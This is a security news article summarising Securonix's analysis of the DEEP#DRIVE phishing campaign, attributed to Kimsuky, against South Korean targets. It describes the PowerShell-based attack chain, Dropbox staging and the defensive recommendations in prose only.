A phishing attack dubbed DEEP#DRIVE is targeting South Korean entities, with thousands already affected. North Korean hackers from the Kimsuky group are the prime suspects behind this cyber espionage campaign.
Securonix has shared its investigation into the DEEP#DRIVE attack campaign, a multi-stage operation targeting South Korean businesses, government entities, and cryptocurrency users since September 2024. The attack’s primary objective is most likely espionage to gather sensitive information from South Korean entities and has already claimed thousands of victims.
The investigation shared with Hackread.com ahead of its publishing, reveals that attackers employed tailored phishing lures written in Korean and disguised as legitimate documents, such as work logs, insurance documents, and crypto-related files, to successfully infiltrate targeted environments.
Securonix has shared an image of a phishing lure disguised as the Telegram.exe application, labelled 대차 및 파레트 (Korean term for bogie and pallet) revealing logistics-related details like product name (제품명), P9 basement factory (P9 지하공장), total weight (총중량), etc., indicating a likely attempt to trick victims in the logistics sector.
These lures, crafted to appeal to their intended audience, were often distributed in trusted file formats like .hwp, .xlsx, and .pptx and hosted on widely used platforms like Dropbox, allowing attackers to evade traditional security defences and “blend into normal user behaviour.”
“It is evident that phishing was the primary method of malware distribution in this campaign as the collected samples and their filenames strongly align with common themes and wording typically used in phishing lures” Secrounix’s researchers explained in their report.
Campaign Analysis
The campaign heavily leveraged PowerShell scripts for payload delivery, reconnaissance (gathering system info like IP address, OS details, antivirus software, and running processes), and establishing persistence (using scheduled tasks like “ChromeUpdateTaskMachine”). Dropbox was also used for data exfiltration.
The attack chain typically begins with a .lnk file disguised as a legitimate document, which initiates the execution of malicious PowerShell scripts. These scripts download further payloads, including a .NET assembly, disguised as a legitimate application (such as “Telegram.exe”), and establish persistence. A key reconnaissance script, “system_first.ps1,” collects and exfiltrates system information.
The final payload, often delivered via a script like “temp.ps1,” is suspected to be a backdoor, though researchers could not capture it during analysis. The attackers’ Dropbox account analysis showed a large number of compromised system configuration files and various malicious payloads.
Stealth and obfuscation are key elements, with attackers using techniques like meaningless variable names, repeated irrelevant assignments, and string concatenation to evade detection, and the removal of associated Dropbox links suggests the attack infrastructure was temporary.
Although the attacker’s infrastructure, particularly Dropbox links, appeared short-lived, the tactics, techniques, and procedures (TTPs) strongly resemble those used by Kimsuky, a North Korean Advanced Persistent Threat (APT) group “known for targeting South Korea and using similar Dropbox-based methods in previous campaigns,” researchers observed.
Securonix recommends user education on phishing, monitoring of malware staging directories, and reliable endpoint logging (e.g. PowerShell logging) to defend against similar attacks.